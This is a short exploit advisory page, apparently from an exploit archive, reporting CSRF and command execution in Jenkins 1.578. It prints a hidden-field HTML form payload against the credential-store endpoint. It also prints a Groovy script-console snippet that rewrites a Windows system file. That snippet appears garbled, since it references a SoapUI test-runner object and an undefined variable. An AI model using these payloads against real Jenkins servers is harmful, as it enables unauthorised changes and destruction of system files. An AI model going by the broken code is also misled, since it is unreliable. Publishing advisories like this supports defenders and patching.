Jenkins 1.578 Cross Site Request Forgery / Command Execution

2014.09.04
Credit: JoeV
Risk: High
Local: No
Remote: Yes
CVE: N/A

#Affected Vendor: http://jenkins-ci.org/ #Date: 03/09/2014 #Discovered by: JoeV #Type of vulnerability: CSRF and Command Execution #Tested on: Windows 7 #Version : 1.578 #Description: Jenkins is susceptible to CSRF attack and command execution. Using groovy one can fire any command and get it executed by the script console thus able to access files, registry keys, values and folders which is outbound for Jenkins. #CSRF -------- #Payload: <form method="POST" name="form0" action="http://localhost:8090/credential-store/createDomain"> <input type="hidden" name="_.name" value="xyz"/> <input type="hidden" name="description" value="abc"/> <input type="hidden" name="json" value="{'name': 'xyz', 'description': 'abc'}"/> <input type="hidden" name="Submit" value="OK"/> </form> Command Execution (/script) ------------------------------------- ArrayList pids = null PrintWriter writer = null File f = new File("C:/Windows/System32/Services.msc") if (f.length() > 0){ pids = new ArrayList() f.eachLine { line -> pids.add(line) } println("Item to be removed: " + pids.get(0)) testRunner.testCase.setPropertyValue( "personId", pid ) pids.remove(0) println pids writer = new PrintWriter(f) pids.each { id -> writer.println(id) } writer.close() } else{ println "Null" } -- Regards, *Joel V*


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top